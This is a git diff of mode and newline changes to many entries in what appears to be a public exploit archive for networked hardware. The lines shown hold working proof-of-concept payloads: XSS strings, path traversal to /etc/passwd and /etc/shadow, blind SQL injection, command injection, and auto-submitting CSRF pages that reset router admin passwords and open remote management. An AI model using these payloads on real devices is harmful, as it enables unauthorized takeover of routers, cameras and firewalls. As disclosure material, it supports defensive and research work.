@@ -15,4 +15,4 @@ Content-length: 0 ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh -http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 \ No newline at end of file +http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 \ No newline at end of file diff --git a/platforms/hardware/remote/35014.txt b/platforms/hardware/remote/35014.txt old mode 100755 new mode 100644 index 595b9119a..c7c2af778 --- a/platforms/hardware/remote/35014.txt +++ b/platforms/hardware/remote/35014.txt @@ -16,4 +16,4 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 1000 ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk= -<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1= \ No newline at end of file +<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1= \ No newline at end of file diff --git a/platforms/hardware/remote/35068.txt b/platforms/hardware/remote/35068.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35069.txt b/platforms/hardware/remote/35069.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35070.txt b/platforms/hardware/remote/35070.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35071.txt b/platforms/hardware/remote/35071.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35103.txt b/platforms/hardware/remote/35103.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35170.txt b/platforms/hardware/remote/35170.txt old mode 100755 new mode 100644 index 8bb0e5900..9b1203e2b --- a/platforms/hardware/remote/35170.txt +++ b/platforms/hardware/remote/35170.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Lexmark Printer X651de is vulnerable; other versions may also be affected. -nmap --script=pjl-ready-message.nse --script-args='pjl_ready_message="<script>alert(1);</script>"' \ No newline at end of file +nmap --script=pjl-ready-message.nse --script-args='pjl_ready_message="<script>alert(1);</script>"' \ No newline at end of file diff --git a/platforms/hardware/remote/35317.txt b/platforms/hardware/remote/35317.txt old mode 100755 new mode 100644 index 0f4e3e508..bfda3564f --- a/platforms/hardware/remote/35317.txt +++ b/platforms/hardware/remote/35317.txt @@ -15,4 +15,4 @@ http://www.example.com/conf/ssl/openssl.pem http://www.example.com/conf/integrity.xml http://www.example.com/conf/jaas/users.xml http://www.example.com/bin/DBSeed.xml -http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert \ No newline at end of file +http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert \ No newline at end of file diff --git a/platforms/hardware/remote/35420.txt b/platforms/hardware/remote/35420.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35421.txt b/platforms/hardware/remote/35421.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35422.txt b/platforms/hardware/remote/35422.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35597.txt b/platforms/hardware/remote/35597.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35620.txt b/platforms/hardware/remote/35620.txt old mode 100755 new mode 100644 index 250f5edfc..10420b8ff --- a/platforms/hardware/remote/35620.txt +++ b/platforms/hardware/remote/35620.txt @@ -8,4 +8,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Firmware versions prior to 8.2.7.6 are vulnerable. -http://www.example.com/cgi/b/ic/connect/?url=[XSS] \ No newline at end of file +http://www.example.com/cgi/b/ic/connect/?url=[XSS] \ No newline at end of file diff --git a/platforms/hardware/remote/35762.txt b/platforms/hardware/remote/35762.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35763.txt b/platforms/hardware/remote/35763.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35764.txt b/platforms/hardware/remote/35764.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35765.txt b/platforms/hardware/remote/35765.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35766.txt b/platforms/hardware/remote/35766.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35779.txt b/platforms/hardware/remote/35779.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35780.txt b/platforms/hardware/remote/35780.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35800.txt b/platforms/hardware/remote/35800.txt old mode 100755 new mode 100644 index 08c8bdcd4..14b536562 --- a/platforms/hardware/remote/35800.txt +++ b/platforms/hardware/remote/35800.txt @@ -6,4 +6,4 @@ Successful exploits will allow a remote attacker to gain access to sensitive inf the following proof of concept is available: -\xff\xff\xff\xff\xff\xff\x00\x06\xff\xf9 \ No newline at end of file +\xff\xff\xff\xff\xff\xff\x00\x06\xff\xf9 \ No newline at end of file diff --git a/platforms/hardware/remote/35817.txt b/platforms/hardware/remote/35817.txt old mode 100755 new mode 100644 index 6e6653718..14a541fa8 --- a/platforms/hardware/remote/35817.txt +++ b/platforms/hardware/remote/35817.txt @@ -7,4 +7,4 @@ A remote attacker can exploit these issues to obtain sensitive information that WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected. http://www.example.com/downloadFile.php -http://www.example.com/BackupConfig.php \ No newline at end of file +http://www.example.com/BackupConfig.php \ No newline at end of file diff --git a/platforms/hardware/remote/35887.txt b/platforms/hardware/remote/35887.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35917.txt b/platforms/hardware/remote/35917.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35925.txt b/platforms/hardware/remote/35925.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35932.c b/platforms/hardware/remote/35932.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/35970.txt b/platforms/hardware/remote/35970.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36205.txt b/platforms/hardware/remote/36205.txt old mode 100755 new mode 100644 index 540945ed9..d0d0b719d --- a/platforms/hardware/remote/36205.txt +++ b/platforms/hardware/remote/36205.txt @@ -8,4 +8,4 @@ GET /log.wri HTTP/1.0 Host: 123.123.123.123 Connection: close User-Agent: brute-forcing -Cookie: SessId=111111111 \ No newline at end of file +Cookie: SessId=111111111 \ No newline at end of file diff --git a/platforms/hardware/remote/36239.txt b/platforms/hardware/remote/36239.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36256.txt b/platforms/hardware/remote/36256.txt old mode 100755 new mode 100644 index 23725ffa8..b5e90baa0 --- a/platforms/hardware/remote/36256.txt +++ b/platforms/hardware/remote/36256.txt @@ -14,4 +14,4 @@ Cisco Unified Communications Manager http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd -http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml \ No newline at end of file +http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml \ No newline at end of file diff --git a/platforms/hardware/remote/36428.txt b/platforms/hardware/remote/36428.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36429.txt b/platforms/hardware/remote/36429.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36475.txt b/platforms/hardware/remote/36475.txt old mode 100755 new mode 100644 index 352f70568..34c229a38 --- a/platforms/hardware/remote/36475.txt +++ b/platforms/hardware/remote/36475.txt @@ -5,4 +5,4 @@ Barracuda Control Center 620 is prone to an HTML injection vulnerability and mul Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. https://www.example.com/bcc/editdevices.jsp?device-type=spyware&selected-node=1&containerid=[IVE] -https://www.example.com/bcc/main.jsp?device-type=[IVE] \ No newline at end of file +https://www.example.com/bcc/main.jsp?device-type=[IVE] \ No newline at end of file diff --git a/platforms/hardware/remote/36511.txt b/platforms/hardware/remote/36511.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36670.txt b/platforms/hardware/remote/36670.txt old mode 100755 new mode 100644 index 9dac3dba5..618640c86 --- a/platforms/hardware/remote/36670.txt +++ b/platforms/hardware/remote/36670.txt @@ -11,4 +11,4 @@ D-Link DNS-325 ShareCenter http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls http://www.example.com/cgi-bin/discovery.cgi -http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml \ No newline at end of file +http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml \ No newline at end of file diff --git a/platforms/hardware/remote/36680.txt b/platforms/hardware/remote/36680.txt old mode 100755 new mode 100644 index e661db139..223fb6563 --- a/platforms/hardware/remote/36680.txt +++ b/platforms/hardware/remote/36680.txt @@ -4,4 +4,4 @@ Multiple Trendnet Camera products are prone to a remote security-bypass vulnerab Successfully exploiting this issue will allow remote attackers to gain access to a live stream from the camera. -http://www.example.com/anony/mjpg.cgi \ No newline at end of file +http://www.example.com/anony/mjpg.cgi \ No newline at end of file diff --git a/platforms/hardware/remote/36767.html b/platforms/hardware/remote/36767.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36831.txt b/platforms/hardware/remote/36831.txt old mode 100755 new mode 100644 index 393782b6f..25d5550f2 --- a/platforms/hardware/remote/36831.txt +++ b/platforms/hardware/remote/36831.txt @@ -4,4 +4,4 @@ Endian Firewall is prone to multiple cross-site scripting vulnerabilities becaus Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. -https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS] \ No newline at end of file +https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS] \ No newline at end of file diff --git a/platforms/hardware/remote/36832.txt b/platforms/hardware/remote/36832.txt old mode 100755 new mode 100644 index f3ae299f3..5442708fe --- a/platforms/hardware/remote/36832.txt +++ b/platforms/hardware/remote/36832.txt @@ -4,4 +4,4 @@ Endian Firewall is prone to multiple cross-site scripting vulnerabilities becaus Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. -https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS] \ No newline at end of file +https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS] \ No newline at end of file diff --git a/platforms/hardware/remote/36833.txt b/platforms/hardware/remote/36833.txt old mode 100755 new mode 100644 index 37248277b..dc6baf7f0 --- a/platforms/hardware/remote/36833.txt +++ b/platforms/hardware/remote/36833.txt @@ -4,4 +4,4 @@ Endian Firewall is prone to multiple cross-site scripting vulnerabilities becaus Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. -https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS] \ No newline at end of file +https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS] \ No newline at end of file diff --git a/platforms/hardware/remote/36864.txt b/platforms/hardware/remote/36864.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36866.txt b/platforms/hardware/remote/36866.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36877.html b/platforms/hardware/remote/36877.html old mode 100755 new mode 100644 index 9984c6702..c1f16995a --- a/platforms/hardware/remote/36877.html +++ b/platforms/hardware/remote/36877.html @@ -13,4 +13,4 @@ This issue affects D-Link DCS-900, DCS-2000, and DCS-5300. <input type="hidden" name="confirm" value="your_pass"/> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/hardware/remote/36931.txt b/platforms/hardware/remote/36931.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36945.txt b/platforms/hardware/remote/36945.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/36995.txt b/platforms/hardware/remote/36995.txt old mode 100755 new mode 100644 index 0439ebf1c..0327c0bc0 --- a/platforms/hardware/remote/36995.txt +++ b/platforms/hardware/remote/36995.txt @@ -15,4 +15,4 @@ The following versions of FirePass are affected: state=%2527+and+ (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ -BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ \ No newline at end of file +BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ \ No newline at end of file diff --git a/platforms/hardware/remote/37037.txt b/platforms/hardware/remote/37037.txt old mode 100755 new mode 100644 index 97b33805b..35d412228 --- a/platforms/hardware/remote/37037.txt +++ b/platforms/hardware/remote/37037.txt @@ -4,4 +4,4 @@ Peakflow SP is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -https://www.example.com/index/"onmouseover="alert(666) \ No newline at end of file +https://www.example.com/index/"onmouseover="alert(666) \ No newline at end of file diff --git a/platforms/hardware/remote/37141.txt b/platforms/hardware/remote/37141.txt old mode 100755 new mode 100644 index 2934ea8b8..5b7a7fb8a --- a/platforms/hardware/remote/37141.txt +++ b/platforms/hardware/remote/37141.txt @@ -4,4 +4,4 @@ The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerabilit Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. -submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1 \ No newline at end of file +submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1 \ No newline at end of file diff --git a/platforms/hardware/remote/37429.txt b/platforms/hardware/remote/37429.txt old mode 100755 new mode 100644 index ad5bb1ef7..5a8f70d2d --- a/platforms/hardware/remote/37429.txt +++ b/platforms/hardware/remote/37429.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Mobility System Software versions prior to 7.6.3 and 7.7.1 are vulnerable. -https://www.example.com/aaa/wba_login.html?wbaredirect=wba-dnserror&9f45dâ?><script>alert(1)</script>22whatever=1 \ No newline at end of file +https://www.example.com/aaa/wba_login.html?wbaredirect=wba-dnserror&9f45dâ?><script>alert(1)</script>22whatever=1 \ No newline at end of file diff --git a/platforms/hardware/remote/37512.txt b/platforms/hardware/remote/37512.txt old mode 100755 new mode 100644 index 90d522fb7..2a22dfecf --- a/platforms/hardware/remote/37512.txt +++ b/platforms/hardware/remote/37512.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable. -www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!] \ No newline at end of file +www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!] \ No newline at end of file diff --git a/platforms/hardware/remote/37513.txt b/platforms/hardware/remote/37513.txt old mode 100755 new mode 100644 index 9b80a5a98..87d6b680d --- a/platforms/hardware/remote/37513.txt +++ b/platforms/hardware/remote/37513.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable. -www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file +www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file diff --git a/platforms/hardware/remote/37564.txt b/platforms/hardware/remote/37564.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/37803.txt b/platforms/hardware/remote/37803.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/37969.txt b/platforms/hardware/remote/37969.txt old mode 100755 new mode 100644 index 7e419fb67..cde1670a4 --- a/platforms/hardware/remote/37969.txt +++ b/platforms/hardware/remote/37969.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable. -http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker \ No newline at end of file +http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker \ No newline at end of file diff --git a/platforms/hardware/remote/38100.txt b/platforms/hardware/remote/38100.txt old mode 100755 new mode 100644 index 54c33616c..51c332044 --- a/platforms/hardware/remote/38100.txt +++ b/platforms/hardware/remote/38100.txt @@ -14,4 +14,4 @@ FortiWeb Virtual Appliance https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C -https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 \ No newline at end of file +https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 \ No newline at end of file diff --git a/platforms/hardware/remote/38186.txt b/platforms/hardware/remote/38186.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38233.txt b/platforms/hardware/remote/38233.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38242.txt b/platforms/hardware/remote/38242.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38308.txt b/platforms/hardware/remote/38308.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38356.txt b/platforms/hardware/remote/38356.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38370.txt b/platforms/hardware/remote/38370.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38389.txt b/platforms/hardware/remote/38389.txt old mode 100755 new mode 100644 index 5d37a5540..c4b939fde --- a/platforms/hardware/remote/38389.txt +++ b/platforms/hardware/remote/38389.txt @@ -14,4 +14,4 @@ http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../.. http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow http://www.example.com/monitor/logselect.php http://www.example.com/broadware.jsp -http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script> \ No newline at end of file +http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script> \ No newline at end of file diff --git a/platforms/hardware/remote/38437.txt b/platforms/hardware/remote/38437.txt old mode 100755 new mode 100644 index 0097440be..65aec2537 --- a/platforms/hardware/remote/38437.txt +++ b/platforms/hardware/remote/38437.txt @@ -9,4 +9,4 @@ The following products are vulnerable: Foscam FI8910W running Embedded Web Interface 2.4.10.3 Foscam FI8908W running Embedded Web Interface 2.4.10.3 -http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url= \ No newline at end of file +http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url= \ No newline at end of file diff --git a/platforms/hardware/remote/38453.txt b/platforms/hardware/remote/38453.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38464.txt b/platforms/hardware/remote/38464.txt old mode 100755 new mode 100644 index c063b6850..4d68d03ee --- a/platforms/hardware/remote/38464.txt +++ b/platforms/hardware/remote/38464.txt @@ -22,4 +22,4 @@ Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 47 -submit_button=xss'%3balert(1)//934&action=Apply \ No newline at end of file +submit_button=xss'%3balert(1)//934&action=Apply \ No newline at end of file diff --git a/platforms/hardware/remote/38481.html b/platforms/hardware/remote/38481.html old mode 100755 new mode 100644 index 4b1b15bc8..c22af372c --- a/platforms/hardware/remote/38481.html +++ b/platforms/hardware/remote/38481.html @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain administrat D-Link DIR-865L firmware version 1.03 is vulnerable; other versions may also be affected. -<html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html> \ No newline at end of file +<html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/38492.html b/platforms/hardware/remote/38492.html old mode 100755 new mode 100644 index 4f88c8dda..aa6b8f5a0 --- a/platforms/hardware/remote/38492.html +++ b/platforms/hardware/remote/38492.html @@ -4,4 +4,4 @@ The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerabi Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. -d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html> \ No newline at end of file +d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/38495.html b/platforms/hardware/remote/38495.html old mode 100755 new mode 100644 index a22b1e748..0508354ad --- a/platforms/hardware/remote/38495.html +++ b/platforms/hardware/remote/38495.html @@ -4,4 +4,4 @@ Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. -<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html> \ No newline at end of file +<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/38501.txt b/platforms/hardware/remote/38501.txt old mode 100755 new mode 100644 index dd605972b..1c8685efb --- a/platforms/hardware/remote/38501.txt +++ b/platforms/hardware/remote/38501.txt @@ -8,4 +8,4 @@ Cisco Linksys E1200 N300 running firmware 2.0.04 is vulnerable. http://www.example.com/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 